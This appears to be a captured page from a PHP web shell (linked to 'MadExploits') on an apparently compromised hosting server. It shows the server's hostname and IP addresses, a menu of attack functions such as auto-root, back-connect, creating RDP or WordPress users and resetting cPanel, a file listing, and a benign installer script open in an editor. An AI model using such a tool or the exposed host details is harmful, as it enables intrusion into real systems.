Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.226.187.232
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
qloapps /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
2.74
KB
-rw-r--r--
changelog.txt
58.1
KB
-rw-r--r--
clone.php
8.85
KB
-rw-r--r--
edit.php
4.44
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
fileindex.php
352
B
-rw-r--r--
import.php
3.88
KB
-rw-r--r--
info.xml
6.08
KB
-rw-r--r--
install.js
1.12
KB
-rw-r--r--
install.php
10.75
KB
-rw-r--r--
install.xml
1.47
KB
-rw-r--r--
md5
3.35
KB
-rw-r--r--
notes.txt
507
B
-rw-r--r--
settings.inc.php
605
B
-rw-r--r--
update_rijndael.php
916
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_rijndael.php
<?php @unlink('update_rijndael.php'); if (function_exists('mcrypt_encrypt') && version_compare(phpversion(), '7.1.0', '<')){ echo '</br>'.'RIJNDAEL_KEYS'.'</br>'; $rijndael_iv = __getiv(); $rijndael_key = __getkey(); echo '<rijndael_iv>'.$rijndael_iv.'</rijndael_iv>'; echo '<rijndael_key>'.$rijndael_key.'</rijndael_key>'; } function __getkey(){ $key_size = mcrypt_get_key_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_ECB); $key = __passwdGen($key_size); return $key; } function __passwdGen($length = 8){ $str = 'abcdefghijkmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; for ($i = 0, $passwd = ''; $i < $length; $i++) $passwd .= substr($str, mt_rand(0, strlen($str) - 1), 1); return $passwd; } function __getiv(){ $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_ECB); $iv = base64_encode(mcrypt_create_iv($iv_size, MCRYPT_RAND)); return $iv; } ?>
Close